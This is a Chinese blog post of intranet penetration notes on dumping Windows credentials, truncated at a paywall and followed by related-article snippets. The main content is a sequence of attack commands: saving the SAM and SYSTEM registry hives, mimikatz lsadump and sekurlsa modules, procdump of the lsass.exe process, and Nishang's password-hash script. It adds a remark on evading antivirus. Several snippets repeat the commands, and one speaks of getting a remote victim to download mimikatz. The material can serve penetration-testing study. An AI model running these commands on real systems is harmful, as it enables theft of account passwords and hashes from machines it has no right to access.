内网安全之:Windows 密码抓取

最新推荐文章于 2024-05-21 20:16:07 发布
最新推荐文章于 2024-05-21 20:16:07 发布
阅读量4k 收藏 6
点赞数 1
分类专栏: Metasploit 文章标签: 安全 windows 内网安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/f_carey/article/details/121319445
版权

郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

Windows 密码抓取

1 mimikatz 抓取密码

注:在 Windows 系统中抓取 NTLM Hash 值或明文密码,必须将权限提升到 System;lsass.exe 进程用于实现 Windows 的安全策略。

  1. 利用通过 SAM 和 System 文件获得 NTLM Hash

    gentilkiwi/mimikatz: A little tool to play with Windows security (github.com)

    # 无工具导出 SAM 文件
reg save hklm\sam sam.hive
reg save hklm\system system.hive
# 使用 mimikatz 读取 SAM 和 System 文件
mimikatz# lsadump::sam /sam:sam.hive /system:system.hive

# 使用 Nishang 的 Get-PassHashes 脚本导出 Hash 值
nishang-0.7.6\Gather> Import-Module .\Get-PassHashes.ps1
Get-PassHashes

  2. 使用 mimikatz 读取本地 SAM 文件

    需要考虑 mimikatz 在目标机器上的免杀特性
# 提权
mimikatz# privilege::debug
# 将权限提升至 System
mimikatz# token::elevate
# 读取本地 SAM 文件,获得 NTLM Hash
mimikatz# lsadump::sam
# 解密 HASH 值
mimikatz# sekurlsa::logonpasswords

    image-20211110092817718

    image-20211110092902820

  3. 使用 mimikatz 离线读取 lsass.dmp 文件

    # 导出 lsass.dmp 文件
找到 lsass.exe 进程,右键选择:创建转储文件

# 利用 procdump 导出 lsass.dmp 文件
procdump.exe -accepteula -ma lsass.exe lsass.dmp

  4. 使用 mimikatz 读取 lsass.dmp 文件中的密码 HASH值

    mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekur
最低0.47元/天 解锁文章
f_carey
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mimikatz常见命令
G3et的博客
01-29 1455
Mimikatz 是一款用于提取 Windows 系统中用户凭据(例如用户名和密码哈希)的开源工具。它可以在不破坏凭据的情况下轻松访问和使用这些凭据。可以被用于攻击域控制器、服务器和客户端机器,从而获得更多权限并执行恶意操作。
域横向移动分析
qq_38675102的博客
12-31 833
windwos内网横移学习笔记
mimikatz抓取windows server2016明文密码
最新发布
m0_64868272的博客
05-21 174
本文的前提我们要有高权限。否则用不了mimikatz
Mimikatz使用
qq_46804551的博客
04-04 688
简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要
mimikatz免杀之通过SAM和System文件抓取密码
m0_47083622的博客
04-19 8527
最近学习使用Mimikatz工具抓取Windows密码时发现Procdump、SQLDumper、DumpMinitool等一系列能导出lsass进程的工具已经被360“拉黑”了。不过还可以通过SAM和System文件抓取密码和Hash,目前测试360和火绒都不会拦截 以下为操作: 利用注册表命令将目标机的sam或者system文件导出 reg save hklm\sam sam.hive reg save hklm\system system.hive 然后将目标机上的sam.hive和syst
[内网渗透]—kerberos&域内提权(pth、wmic)
Sentiment的博客
12-08 488
在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。在域渗透过程中 Kerberos 协议的攻防也是很重要的存在。Kerberos 主要是用在域环境下的身份认证协议。PsExec是SysInternals套件中的一款强大的软件。
Mimikatz Windows 密码抓取神器
05-27
这款工具因其强大的密码抓取能力而闻名,可以提取出系统内存中的明文密码、哈希值以及其他敏感凭证,从而帮助安全研究人员检测系统的漏洞和防护措施。 在Windows环境中,Mimikatz 能够执行以下关键功能: 1. **LSA...
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南 内网安全攻防渗透测试实战指南是指在内网中进行的渗透测试实战指南,旨在帮助安全人员和渗透测试人员更好地理解内网安全攻防的原理和方法。 内网安全攻防渗透测试实战指南主要包含...
内网渗透之windows权限维持
07-18
【标题】"内网渗透之windows权限维持"揭示了网络安全领域的一个重要话题——在Windows操作系统环境中如何保持已获得的权限,以便进行深度的系统分析或恶意活动。这通常涉及到对系统内部工作原理的理解,以及利用特定...
内网-内网安全攻防-笔记.pdf
09-18
内网-内网安全攻防-笔记.pdf
最新windows密码取证神器mimikatz
01-11
最新windows密码获取神器mimikatz,右键以管理员身份运行软件,依次输入两条命令 第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords //抓取密码
深信服SASE服务:内网安全接入
05-05
深信服SASE服务:内网安全接入
mimikatz的使用
热门推荐
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-15 3万+
mimikatz的下载地址 , 提取码是 kcuh mimikatz是个好东西,它的功能很多,最重要的是能获取windows的账号及明文密码 使用方法: 1:远程连接使用 控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 这里抓到了administrator的账号,密码是null,说明没设密码 注意: 1、 文件夹里有两个版本,一个是对应32位系统的,一个是64位系
Mimikatz + procdump 的使用
键盘上温暖而又美好的时光
11-15 6096
控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 ​​​​​​https://github.com/gentilkiwi/mimikatz/releases privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 mimikatz是从 lsass.exe进程中获取windows的账号及密码的, 这时,我们可以帮对方安装一个procdump64.exe(这是微软自己的工具,可以放心使用) 然后从 lsass.exe
渗透测试之Mimikatz2.2 如何抓取Win11登录明文密码
玩人工智能的辣条哥的博客
01-18 903
1.攻击者IP:192.168.1.35系统: KALI2022(vmware 16.0)2.靶机IP:192.168.1.16系统: Windows113.USB无线网卡4.Mimikatz 2.2 (win版)
mimikazi教程
tomyyyyy
08-24 2021
目录mimikazi教程1、简介1.1、背景介绍1.2、官方链接1.3、mimikatz 与凭证2、基本使用2.1、常用命令2.2、远程连接使用2.3、本地使用2.4、读取域控成员Hash2.4.1、域控本地读取2.4.2、导出域成员Hash2.4.3、secretsdump脚本直接导出域hash2.5、哈希传递2.5.1、工作组环境2.5.2 域环境2.6 票据传递攻击(PTT)2.6.1 黄...
内网渗透之某后渗透利用【网络安全
kali_Ma的博客
03-23 3301
主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码
技术分享 | mimikatz的常见使用方法
Uguardsec的博客
08-10 3162
0x00简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值